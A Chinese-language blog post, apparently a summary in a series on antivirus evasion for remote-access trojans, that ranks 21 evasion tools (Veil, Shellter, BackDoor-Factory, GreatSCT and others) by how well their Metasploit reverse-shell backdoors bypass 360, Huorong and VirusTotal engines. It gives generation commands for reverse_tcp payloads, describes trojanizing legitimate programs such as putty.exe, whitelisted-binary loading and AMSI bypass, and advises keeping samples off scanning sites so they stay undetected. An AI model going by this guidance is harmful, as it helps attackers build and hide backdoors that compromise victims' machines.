Veil、Venom、Shellter、BackDoor-Factory、Avet、TheFatRat、Avoidz、Green-Hat-Suite、zirikatu、AVIator、DKMC、Unicorn、Python-Rootkit、DKMC、Unicorn、Python-Rootkit、ASWCrypter、nps_payload、GreatSCT、HERCULES、SpookFlare、SharpShooter、CACTUSTORCH、Winpayload 等。

免殺測試主要是使用了 metasploit 或 cobaltstrike 生成的代碼或程序進行免殺處理，在實驗機 (win7 x64) 上安裝了 360 全家桶和火絨進行本地測試，在 https://www.virustotal.com/上進行在線查殺（如果是自己做免殺，建議測試機不要聯互聯網，更不要上傳到 virustotal.com 類似的平臺上）。

我從 virustotal.com 中選擇了幾款常見的殺軟拿出來做個對比。

幾點說明：

1、上表中標識 √ 說明相應殺毒軟件未檢測出病毒，也就是代表了 Bypass。

2、爲了更好的對比效果，大部分測試 payload 均使用 msf 的 windows/meterperter/reverse_tcp 模塊生成。

3、由於本機測試時只是安裝了 360 全家桶和火絨，所以默認情況下 360 和火絨殺毒情況指的是靜態+動態查殺。360 殺毒版本 5.0.0.8160(2020.01.01)，火絨版本 5.0.34.16(2020.01.01)，360 安全衛士 12.0.0.2002(2020.01.01)。

4、其他殺軟的檢測指標是在 virustotal.com（簡稱 VT）上在線查殺，所以可能只是代表了靜態查殺能力，數據僅供參考，不足以作爲殺軟查殺能力或免殺能力的判斷指標。

5、完全不必要苛求一種免殺技術能 bypass 所有殺軟，這樣的技術肯定是有的，只是沒被公開，一旦公開第二天就能被殺了，其實我們只要能 bypass 目標主機上的殺軟就足夠了。

由於每種免殺方法和工具之前都發過文章一一介紹了，這裏只是做一個總結和索引，所以本文中儘量只是簡要文字描述，不然的話這一篇文章可能會太超長了。

0x03 工具免殺

3.1 Veil 免殺 (VT 免殺率 23/71)

操作便利★★

免殺效果★★★

推薦指數★★★

詳細文章鏈接：https://mp.weixin.qq.com/s/-PHVIAQVyU8QIpHwcpN4yw

Veil、Venom 和 Shellter 是三大老牌免殺工具，雖然說人怕出名豬怕壯，但目前這幾款免殺工具在擴展性和免殺能力方面依然有着不錯的表現。Veil 可以生成基於 c、go、ruby、python、c#、perl、powershell 等格式的 payload，這點來說絕對強於其他絕大部分免殺工具。

Veil 是一個用 python 寫的免殺框架，可以將任意腳本或一段 shellcode 轉換成 Windows 可執行文件，還能利用 Metasploit 框架生成相兼容的 Payload 工具，從而逃避了常見防病毒產品的檢測。

Veil 的手工安裝比較費勁，好在有 docker 鏡像，可以直接 pull 回本地安裝使用。

3.1.1 使用 veil 直接生成 exe(VT 查殺率 44/70)

veil 可以直接生成支持 msf 的 payload。測試時使用 go 語言生成 msf 的 payload。

在測試主機執行 go_msf.exe，msf 中可上線。virustotal.com 中 44/71 個報毒

雖然查殺率還比較高，不過火絨和 360 都能靜態+動態免殺。比較遺憾的是生成的 exe 文件比較大，go 語言生成的 exe 大約 2M,python 生成的 exe 大約 4M，ruby 生成的 exe 大約 700K，相比 msf 原生態的 exe 大打多了。

3.1.2 使用 veil+mingw-w64(VT 查殺率 23/71)

先用 veil 生成一個可以被 msf 利用的 c_msf.c 然後用 mingw-w64 來編譯

全程開啓 360 衛士和殺毒以及火絨，編譯、運行、上線都沒有問題。

virustotal.com 中 23/71 個報毒

3.2 Venom 免殺 (VT 免殺率 11/71)

操作便利★★

免殺效果★★★★

推薦指數★★★★

詳細文章鏈接：https://mp.weixin.qq.com/s/CbfxupSWEPB86tBZsmxNCQ

Venom 的一些功能還會直接調用 Veil-Evasion.py，unicorn.py，powersploit.py 等來直接創建免殺程序，避免重複造輪子。

經測試，使用 venom 生成 exe 後門，virustotal.com 中 19/71 個報毒

使用 venom 生成 dll 後門，virustotal.com 中 11/70 個報毒，而且能過微軟和卡巴。

在 venom 生成編譯的過程中可以看到他生成的 shellcode 其實是直接調用的 msfvenom，而且在最後也可以和 msf 聯動進行監聽，還支持 apache 的 web 分發，很多模塊都能和 msf 無縫對接，雖然被殺軟盯的緊但免殺體驗還是不錯的。

3.3 Shellter 免殺 (VT 免殺率 7/69)

操作便利★★★★★

免殺效果★★★★★

推薦指數★★★★★

詳細文章鏈接：https://mp.weixin.qq.com/s/ASnldn6nk68D4bwkfYm3Gg

Shellter 是一個開源的免殺工具，利用動態 Shellcode 注入或者命令來實現免殺的效果。

Shellter 安裝非常簡單，使用也非常便捷，而且生成的 payload 免殺效果也都比較好，windows 和 linux 下都可以使用，實在是居家旅行必備良藥。我是用的自動模式進行生產 payload, 你可以根據自己的需要進行手動配置，這樣生成的 payload 免殺效果會更好。

因爲 Shellter 生成的 shellcode 是動態的，所以被查殺的機率也有所不同，測試過幾次自動化生成的 payload，最好的秒殺效果是 4/71，最差的 15/70，整體來說也算不錯了。

我就直接用 kali 自帶的 shellter 進行演示，需要提前準備一個 pe 文件作爲被注入程序。

還是選擇 windows/meterpreter/reverse_tcp 作爲 payload

全程自動化生成，最終的生成文件會替換原來的 putty.exe。

在測試機中執行生成的 putty.exe，360 和火絨均可免殺

msf 正常上線，virustotal.com 中 7/69 個報毒，卡巴、瑞星、微軟三個都沒 bypass。。

3.4 BackDoor-Factory 免殺 (VT 免殺率 13/71)

操作便利★★

免殺效果★★★★★

推薦指數★★★★★

詳細文章鏈接：https://mp.weixin.qq.com/s/A30JHhXhwe45xV7hv8jvVQ

BackDoor-factory，又稱後門工廠 (BDF)，BDF 是也是一款老牌的免殺神器，其作者曾經在 2015 年的 blackhat 大會上介紹過該工具。該工具還有很強大的一些其他功能，比如加私鑰證書、CPT 等等。但是作者已經於 2017 年停止更新，免殺效果就算現在來看也還算不錯的。

利用 backdoor-factory，用戶可以在不破壞原有可執行文件的功能的前提下，在文件的代碼裂隙中插入惡意代碼 Shellcode。當可執行文件被執行後，就可以觸發惡意代碼。Backdoor Factory 不僅提供常用的腳本，還允許嵌入其他工具生成的 Shellcode，如 Metasploit。

原理：可執行二進制文件中有大量的 00, 這些 00 是不包含數據的, 將這些數據替換成 payload, 並且在程序執行的時候,jmp 到代碼段, 來觸發 payload。backdoor-factory 是把 shellcode 插入到一個正常的 exe 文件的代碼”縫隙”中，類似於捆綁但不是捆綁，所以需要提前準備一個被捆綁的宿主 exe 文件。

當使用 BackDoor-Factory 直接生成免殺後門時，virustotal.com 中 13/69 個報毒。

還可以使用自己定義的 shellcode，virustotal.com 中 14/71 個報毒

3.5 Avet 免殺 (VT 免殺率 17/71)

操作方便★★

免殺效果★★★★

推薦指數★★★★

詳細文章鏈接：https://mp.weixin.qq.com/s/EIfqAbMC8HoC6xcZP9SXpA

Avet 全稱 AntiVirus Evasion Tool，2017 年在 blackhat 大會上公開演示，可對 shellcode，exe 和 dll 等多種載荷進行免殺處理，使用了多種不同的免殺技術，具有較好的免殺效果，據說在 blackhat 大會上演示時免殺效果震撼全場。

生成的 payload 在 virustotal.com 中 17/71 個報毒

可能是因爲知名度太高，默認輸出的 payload 免殺能力只能算是一般，測試了幾個模塊，最好的免殺是 13/71，最差的是 36/71，不過相比 msf 原生的免殺已經好很多了。

而且 Avet 提供了強大的自定義功能，在 build 文件夾下可以看到所有的 payload 生成腳本，很多參數都可以自己設定。Avet 框架也是比較成熟的，可以輕鬆的進行二次開發，很容易能開發出來自己的專用免殺工具。

3.6 TheFatRat 免殺 (VT 免殺率 22/70)

操作便利★★

免殺效果★★★★

推薦指數★★★★

詳細文章鏈接：https://mp.weixin.qq.com/s/zOvwfmEtbkpGWWBn642ICA

TheFatRat 創建的後門或者 payload，可以在 Linux，Windows，Mac 和 Android 上等多種平臺上執行，可生成 exe、apk、sh、bat、py 等多種格式。TheFatRat 可以和 msf 無縫對接，並且集成內置了 Fudwin、Avoid、backdoor-factory 等多個免殺工具，對 powershell 的免殺姿勢尤其多樣。

TheFatRat 創建的後門格式和支持的平臺比較多樣化，而且還支持生成 CDROM/U 盤中能自動運行 (生成 AutoRun 文件) 的後門文件，並且可以對 payload 更改圖標，具有一定僞裝效果。

使用 TheFatRat 生成 ps1-exe，virustotal.com 中 22/70 個報毒

使用 TheFatRat 生成加殼 exe，virustotal.com 中 12/70 個報毒

使用 TheFatRat 編譯 C#+powershell 生成 exe，virustotal.com 中 37/71 個報毒

TheFatRat 的很多免殺方式是藉助於 msfvenom 編碼、upx 等加殼壓縮、c/c# 編譯等將 powershell 混淆後編譯成 exe 或 bat 文件，但有些在執行時還是會調用 powershell，而 powershell 的調用已經被各大殺軟盯的很緊了，所以查殺效果只能算是一般了。

3.7 Avoidz 免殺 (VT 免殺率 23/71)

操作便利★★

免殺效果★★★

推薦指數★★★

詳細文章鏈接：https://mp.weixin.qq.com/s/TnfTXihlyv696uCiv3aWfg

avoidz 是一個比較使用比較簡單的小工具，利用 msf 生成 powershell 的 shellocde，然後利用 c#、python、go、ruby 等語言對 shellcode 進行編譯生成 exe 而達到免殺的效果，套路比較簡單，靜態檢測查殺率還算可以，但行爲檢測就很容易被查殺出來，和 TheFatRat 具有相同的缺陷。倒是可以借鑑下他的原理，自己寫個免殺工具。

使用 avoidz 編譯 C# 生成 exe(VT 免殺率 23/68)

提供 3 種 C 代碼編譯成 exe 的方式，想了解詳情的可以 cat avoidz.rb 查看具體區別。

我以第一種爲例進行測試

./avoidz.rb -h 10.211.55.2 -p 3333 -m windows/meterpreter/reverse_tcp -f c1

執行後可正常上線。開啓殺軟進行測試，靜態測試沒問題，行爲檢測馬上露餡。

virustotal.com 中 23/68 個報毒

使用 avoidz 編譯 python 生成 exe(VT 免殺率 11/68)

使用 python 生成 exe 文件

./avoidz.rb -h 10.211.55.2 -p 3333 -m windows/meterpreter/reverse_tcp -f py

靜態查殺沒問題，行爲檢測依舊被攔

virustotal.com 中 11/68 個報毒

使用 avoidz 編譯 golang 生成 exe(VT 免殺率 23/71)

使用 go 生成 exe 文件

./avoidz.rb -h 10.211.55.2 -p 3333 -m windows/meterpreter/reverse_tcp -f go

go 版本的靜態查殺都沒通過，行爲檢測依據被攔

virustotal.com 中 23/71 個報毒

3.8 Green-Hat-Suite 免殺 (VT 免殺率 23/70)

操作便利★★★★

免殺效果★★★★

推薦指數★★★★

詳細文章鏈接：https://mp.weixin.qq.com/s/MVJTXOIqjgL7iEHrnq6OJg

Green-Hat-Suite 是國內大佬 Green-m 的大作，Green-m 大佬在 freebuf 和自己博客上 https://green-m.me/寫了很多免殺相關的文章，開始的幾篇文章裏面有一些知識點就是從他那學到的，而且 msfvenom 命令自動補全腳本也是出自他之手，之前有的知識點寫的不太準備大佬也熱情的給予指正，萬分感謝！

Green-Hat-Suite 也是和 msf 無縫對接的免殺工具，使用 ruby 開發，可在 linux/windows 上安裝，使用非常簡單，雖然已經接近兩年沒有更新了，但目前來看免殺效果仍然很不錯。

virustotal.com 中 23/70 個報毒

Green-Hat-Suite 調用了 msfvenom 進行隨機編碼生成 shellcode，然後 Green-Hat-Suite 對 shellcode 進行多重免殺處理混淆，並最終編譯生成不同的 exe 後門文件。雖然原理不算複雜，但兩年前的作品，至今來說免殺效果仍很不錯。

3.9 zirikatu 免殺 (VT 免殺率 39/71)

操作便利★★★★

免殺效果★★

推薦指數★★

詳細文章鏈接：https://mp.weixin.qq.com/s/5xLuu5UfF4cQbCq_6JeqyA

zirikatu 是一個用 bash 編寫的小腳本，依賴於 msf、mono、mcs 等軟件，也是調用 msfvenom 生成 shellcode, 然後將 shellcode 嵌入 C# 代碼，試用 Mcs 編譯生成 exe 後門。

Mono 可以讓.NET 程序跨平臺運行在 Linux,BSD,Windows,MacOS,Sun Solaris,Wii, 索尼 PlayStation, 蘋果 iPhone 等幾乎所有常見的操作系統之上。從 Mono2.11 版本開始，採用的編譯器叫 mcs，它的作用是將 C# 編譯爲 CIL（Common Language Infrastructure，通用中間語言，也叫 MSIL 微軟中間語言，這個語言能運行在所有支持 CIL 的環境中）

virustotal.com 中 39/71 個報毒

zirikatu 利用 msfvenom 生成 shellcode，之後再進行一定處理，編譯生成 exe。原理比較簡單，操作比較方便，免殺效果相比 Green-Hat-Suite 來說雖然一般，但能過 360、火絨和瑞星的確有點出人意料。

3.10 AVIator 免殺 (VT 免殺率 25/69)

操作便利★★★★

免殺效果★★★

推薦指數★★★

詳細文章鏈接：https://mp.weixin.qq.com/s/JYMq_qHvnslVlqijHNny8Q

AVIator 使用 AES 加密來加密給定的 Shellcode 加密，生成一個包含加密有效負載的可執行文件，然後使用各種注入技術將 shellcode 解密並注入到目標系統，從而繞過殺毒軟件的檢測。

virustotal.com 中 25/69 個報毒

AVIator 使用非常簡單，小巧便攜。可以將 shellcode 注入 explorer、notepad 或其他自定義程序，免殺效果還算可以，能過 360 殺毒和火絨動態和靜態檢測，瑞星靜態查殺也可通過。

3.11 DKMC 免殺 (VT 免殺率 8/55)

操作便利★★★

免殺效果★★★★

推薦指數★★★

詳細文章鏈接：https://mp.weixin.qq.com/s/UZqOBQKEMcXtF5ZU7E55Fg

DKMC 是 Don’t Kill My Cat (DKMC) 的簡稱，谷歌翻譯爲”不要殺害我的小貓咪”，這個名字也是挺少女心的…DKMC 是一種生成混淆的 shellcode 的工具，並把 shellcode 合成到圖像文件中，最終依靠 PowerShell 執行最終的 shellcode 有效負載。

virustotal.com 上 BMP 文件的查殺率爲 5/55，查殺出來爲 BMP 木馬

virustotal.com 上 ps 代碼的查殺率爲 8/55，判斷 ps 下載行爲。

DKMC 主要把 shellcode 注入到 bmp 圖像中，然後使用 powershell 來執行其中的 shellcode，但是很多殺軟都會監測 powershell 的執行動作，所以 virustotal.com 的靜態檢測不足以說明什麼。

3.12 Unicorn 免殺 (VT 免殺率 29/56)

操作便利★★★★

免殺效果★★★

推薦指數★★★

詳細文章鏈接：https://mp.weixin.qq.com/s/y7P6bvHRFes854EAHAPOzw

Magic Unicorn 是一個比較簡單的小工具，主要是基於 Matthew Graeber 提出的 PowerShell 攻擊技術以及 David Kennedy 和 Josh Kelly 提出的 powershell bypass 技術，把所有 payload 都轉換成 powershell 代碼。

Magic Unicorn 支持 cobalt strike、Metasploit 和自定義的 shellcode。

virustotal.com 上 ps1.exe 文件的查殺率爲 36/69，轉 exe 後略微有點慘。

生成了一個 hta 文件進行測試，virustotal.com 上查殺率爲 29/56

Unicorn 使用比較簡單，可以生成 powershell 代碼、macro 宏代碼、hta、dde 等格式的 payload 文件，可以在社工時直接使用，不過因爲生成的代碼關鍵字比較明顯，所以靜態查殺很多都沒通過，只能說生成代碼多樣但免殺效果一般。

3.13 Python-Rootkit 免殺 (VT 免殺率 7/70)

操作便利★★

免殺效果★★★★

推薦指數★★★★

詳細文章鏈接：https://mp.weixin.qq.com/s/OzO8hv0pTX54ex98k96tjQ

Python-Rootkit，2017 年開源的一款工具，當時號稱 Bypass all anti-virus，主要是對 python 代碼進行多次編碼，然後利用 py2exe 把 python 代碼打包成 exe，其實最終執行的是 powershell 命令，使用了 PowerSploit 的 Invoke-Shellcode.ps1 來反彈 msf 的 shell。

程序還添加了後門持續化的功能，大體就是 10 秒鐘檢測一次連接是否正常，如果連接不存在就再重連 msf，另外還使用了註冊表添加了自啓動項。

virustotal.com 上查殺率爲 7/69，如果有動態檢測，估計這個查殺率會非常高。

Python-Rootkit 在測試中因爲 msf5 一直沒法上線折騰了很長時間，官方 issue 居然沒有反饋這個問題的，後來調試了半天發現是 Invoke-Shellcode.ps1 和 msf 的問題。

免殺效果整體感覺一般，還是 python 生成 exe，執行後調用 powershell 下載 Invoke-Shellcode.ps1，然後反彈 shell，應該很容易觸發殺軟的行爲檢測。

3.14 ASWCrypter 免殺 (VT 免殺率 19/57)

操作便利★★★★

免殺效果★★★

推薦指數★★★

詳細文章鏈接：https://mp.weixin.qq.com/s/tT1i55swRWIYiEdxEWElSQ

ASWCrypter 是 2018 年開源的免殺工具，原理比較簡單，使用 msf 生成 hta 代碼，然後使用 python 腳本對 hta 代碼進行一定編碼處理，生成新的 hta 後門文件，從而達到免殺效果。

生成 hta 後門文件，virustotal.com 上查殺率爲 19/57

ASWCrypter 是使用 msfvenom 生成基於 powershell 的 hta 後門文件，然後進行編碼處理，達到一定的免殺效果，不過因爲會調用 powershell，行爲檢測還是很容易被檢測出來。

3.15 nps_payload 免殺 (VT 免殺率 3/57)

操作便利★★★★

免殺效果★★★★

推薦指數★★★★

詳細文章鏈接：https://mp.weixin.qq.com/s/XmSRgRUftMV3nmD1Gk0mvA

nps_payload 是 2017 年開源的工具，安裝使用都比較簡單,nps_payload 可以生成基於 msbuild 的 xml 文件和獨立執行的 hta 文件，並對 xml 文件和 hta 文件做了一定的混淆免殺，從而達到免殺的效果。

Microsoft Build Engine 是一個用於構建應用程序的平臺，此引擎也被稱爲 msbuild，它爲項目文件提供一個 XML 模式，該模式控制構建平臺如何處理和構建軟件。Visual Studio 使用 MSBuild，但它不依賴於 Visual Studio。通過在項目或解決方案文件中調用 msbuild.exe，可以在未安裝 Visual Studio 的環境中編譯和生成程序。

使用 nps_payload 生成的 hta 文件，virustotal.com 上查殺率爲 7/57

nps_payload 只是使用了白名單 msbuild.exe 方法，nps_payload 還對生成的文件進行了混淆處理，使用非常簡單，免殺效果也是不錯的。

3.16 GreatSCT 免殺 (VT 免殺率 14/56)

操作便利★★★★

免殺效果★★★

推薦指數★★★★

詳細文章鏈接：https://mp.weixin.qq.com/s/s9DFRIgpvpE-_MneO0B_FQ

GreatSCT 可以基於 Metasploit、自定義 shellcode、powershell 等生成 payload，然後可利用多種白名單程序進行加載，從而達到免殺的目的。

支持的 6 種白名單方式:

1、Installutil.exe：安裝程序工具是一款命令行工具，允許您通過運行安裝程序組件來安裝和卸載特定程序集中的服務器資源。

2、Msbuild.exe：Microsoft Build Engine 是一個用於構建應用程序的平臺。這個引擎，也稱爲 MSBuild。

3、Mshta.exe：Mshta.exe 運行 Microsoft HTML 應用程序，Windows OS 實用程序負責運行 HTA（HTML 應用程序）文件。我們可以運行 JavaScript 或 Visual 的 HTML 文件。

4、Regasm.exe：程序集註冊工具讀取程序集內的元數據，並將必要的記錄添加到註冊表中, 從而允許 COM 客戶端透明地創建.NET 框架類。

5、Regsvcs.exe：RegSvcs 表示 Microsoft .NET 遠程註冊表服務，它以.NET 服務安裝著稱。

6、Regsvr 32.exe：Regsvr 32 是一個命令行實用程序，用於在 Windows 註冊表中註冊和取消註冊 OLE 控件，例如 DLL 和 ActiveX 控件。

生成基於白名單 Msbuild.exe 的文件，virustotal.com 上 payload.xml 文件查殺率爲 14/56

生成單個可執行 payload.exe 文件，virustotal.com 上查殺率爲 30/69，這個 exe 文件查殺率略高。

GreatSCT 由於是基於白名單的文件加載，所以生成的.xml 或.dll 之類免殺效果比較好，而.exe 文件免殺效果就比較一般了，所以可以根據具體情境去結合使用。GreatSCT 提供了 6 中白名單方式，綜合免殺效果還算可以。

3.17 HERCULES 免殺 (VT 免殺率 29/70)

操作便利★★

免殺效果★★★

推薦指數★★★

詳細文章鏈接：https://mp.weixin.qq.com/s/Rkr9lixzL4tiL89r10ndig

HERCULES，2017 年的免殺工具，可以直接生成 msf 可用的 payload 並進行免殺，也可以對自定義 payload 進行免殺，還可以進行後門文件捆綁，並可進行 upx 加殼，使用比較簡單，但安裝可能遇到不少問題。

HERCULES 也是和 msf 無縫對接的免殺工具，免殺相對也比較簡單一些，具體免殺的實現可以查看 HERCULES/src/EGESPLOIT/RSE/BypassAV.go 文件，使用了傳統的添加花指令的方式進行免殺。

virustotal.com 上查殺率爲 29/70

HERCULES 免殺原理相對簡單，對 payload 添加無用代碼和多次跳轉的方式進行免殺處理，從實際測試來看免殺效果只能說是一般，據官方演示在 2017 年的時候免殺效果應該很棒。可以對其免殺代碼進行定製化修改，做成自己輪子工具，別往 virustotal.com 上傳，這樣被查殺概率也會小一些。

3.18 SpookFlare 免殺 (VT 免殺率 16/67)

操作便利★★★★

免殺效果★★★★

推薦指數★★★★

詳細文章鏈接：https://mp.weixin.qq.com/s/LfuQ2XuD7YHUWJqMRUmNVA

SpookFlare，2018 年開源的工具，目前還在更新，使用了多種方式進行 bypass。可直接生成基於 Meterpreter、Empire、Koadic 等平臺的的 shellcode，並對代碼進行混淆、二次編碼、隨機填充字符串等，從而達到較好的免殺效果。

SpookFlare 支持生成 4 類 payload，分別是 msf 的 exe 程序 (需要自己編譯)、msf 的 ps1 腳本 (做了免殺混淆)、hta 文件、office 宏代碼。

生成 exe 文件，virustotal.com 上查殺率爲 16/67，在 exe 裏面能算一般以上了。

SpookFlare 使用了多種方式進行免殺，exe 的免殺可能效果不算太出色，但是對 powershell 腳本和 hta 文件等的免殺做的還是不錯的，基本靜態查殺都能 bypass。

3.19 SharpShooter 免殺 (VT 免殺率 22/57)

操作便利★★★★

免殺效果★★

推薦指數★★★

詳細文章鏈接：https://mp.weixin.qq.com/s/EyvGfWXLbxkHe7liaNFhGg

Sharpshooter，2018 年開源的工具，知名度較高，基於 python2 開發，是比較專業的 Payload 生成框架，支持反沙箱、分階段和無階段的 Payload 執行，並能夠生成 hta、js、jse、vba、vbe、vbs、wsf 等多種格式的 payload，創建的 Payload 可用於編譯執行任意 C# 源代碼。Sharpshooter 還能對 Payload 使用隨機密鑰進行 R S A 加密，還能檢測沙箱，從而避開殺軟的檢測。

生成 hta 後門文件，virustotal.com 上查殺率爲 22/57

SharpShooter 算是比較複雜的一個框架，支持多種 payload，能在.NET 框架的 v2、v3 和 v4 版本上都能執行，涵蓋了絕大部分的 Windows 系統。但也因爲 SharpShooter 的知名度比較高，默認生成的 payload 已經被查殺的比較嚴重，但其實現方式和思路是比較值得人學習的。

而且在 2019 年 1 月 Sharpshooter 加入了 AMSI 的 bypass 模板，使用參數–amsi amsienable 可以使用該模塊來 Kill 掉 AMSI，感興趣的可以試一下。

3.20 CACTUSTORCH 免殺 (VT 免殺率 23/57)

操作便利★★★★

免殺效果★★

推薦指數★★★

詳細文章鏈接：https://mp.weixin.qq.com/s/g0CYvFMsrV7bHIfTnSUJBw

在 2017 年 4 月由 James Forshaw 開源了一個工具 DotNetToJScript，能夠利用 JS 或者 Vbs 等腳本加載.Net 程序。在 DotNetToJScript 發佈後，有幾款工具根據其原理開發出來，比如 CACTUSTORCH、SharpShooter、StarFighters 等等。

而 CACTUSTORCH 和 SharpShooter 都同一個組織開發，2017 年發佈，主要使用 vbs 或 js 執行 C# 的二進制 payload，提供多種方式繞過殺軟，支持 js、vbs、vbe、vba、hta 等多種格式，還提供了支持 Cobalt Strike 的 cna 文件。

CACTUSTORCH 生成的腳本可以用於執行 C# 的二進制文件，CACTUSTORCH 在免殺方面有以下幾個特性：

1、在 payload 中不使用 Kernel32 API 聲明，避免被殺軟檢測

2、可以在 C＃二進制內機械能混淆

3、可任意指定目標二進制程序進行注入

4、允許指定任意 shellcode

5、不產生 PowerShell.exe

6、不需要 Powershell

7、不需要 office

8、不調用 WScript.Shell

9、不需要分段，因爲完整的無階段 shellcode 可以包含在傳送的 payload 內

10、沒有靜態父對子進行生成，用戶可以更改 wscript.exe 生成的內容

以生成 js 腳本爲例進行測試,virustotal.com 上查殺率爲 27/57，這個查殺率還是挺高的。

生成 vbs 腳本,virustotal.com 上查殺率爲 23/57

因爲 CACTUSTORCH 也是基於 DotNetToJScript 來實現免殺的工具，同類工具裏知名度比較高，所以被查殺的有些慘不忍睹，不過能直接過 360 和火絨也算一個小亮點了。殺軟查殺其腳本主要是裏面很多代碼關鍵字都被列入了特徵字符，感興趣的可以嘗試修改其腳本代碼做二次免殺。

3.21 Winpayloads 免殺 (VT 免殺率 18/70)

操作便利★★

免殺效果★★★★

Winpayloads，2019 年開源的免殺 payload 生成工具，可以和 Msf 無縫對接，自身也可以作爲獨立遠控軟件來試用。主要是使用 python 對 shellcode 進行處理，然後編譯成 exe 文件，從而達到免殺的效果。

Winpayloads 的常規安裝比較複雜，依賴的軟件比較多，需要安裝 winbind、impacket、Wine、wine32、Pywin32、pyinstaller、PsexecSpray、pycrypto 等等，所以官方後來直接把常規安裝給去掉了，直接建議使用 docker，docke 安裝起來就非常簡單了。

生成獨立可執行後門 exe 文件，virustotal.com 平臺查殺率也爲 18/70

Winpayloads 使用比較簡便，生成的 payload 免殺效果也是不錯的，使用了多種技術來免殺和實施後滲透，唯一的缺點就是生成的 payload 都有點偏大，大約 2.7M 左右。

四、工具篇小結

工具篇主要是對 21 款免殺工具進行了學習和研究，雖然過程比較枯燥，但的確學到了很多東西，有些軟件使用了比較簡單的技巧但免殺效果卻非常好。

比如使用了程序”縫隙”插入技術的 Shellter 和 BackDoor-Factory，免殺效果也很不錯；

還有一些使用了白名單技術的工具，如 nps_payload、GreatSCT、Evasion 等工具，對 xml 或 hta 等進行免殺處理，然後使用白名單程序進行執行。

還有一些是對 powershell 進行免殺，如 veil、Venom、Unicorn、DKMC、Unicorn、SpookFlare 等，對 ps1 代碼的處理方式也是百花齊放。

還有使用了 python、go 等代碼嵌入處理 payload 然後編譯 exe 的，比如 Venom、avet、BackDoor-Factory、Python-Rootkit、HERCULES、Winpayloads 等等。

通過研究學習這些免殺工具，從而揭開免殺工具的神祕面紗，之後你會發現其實自己做一個通用的免殺工具也不是太難，下一步打算向 Green-m 大佬學習，也能自己寫一個免殺工具。

PS：測完這 21 個工具，估計我在 virustotal.com 平臺上貢獻了不下於 500 個樣本，各大殺軟的感謝信就算了，別發律師函就行。所以特別囑咐一下，自己做免殺的時候千萬不要上傳在線檢測平臺，可能你傳上去的時候沒有殺軟能查殺，但幾個小時候後可能就有能查殺的了。

雖然我們生活在陰溝裏，但依然有人仰望星空！

【免殺篇】遠控免殺專題(66)-工具篇總結

0x01 前言

0x02 免殺效果概覽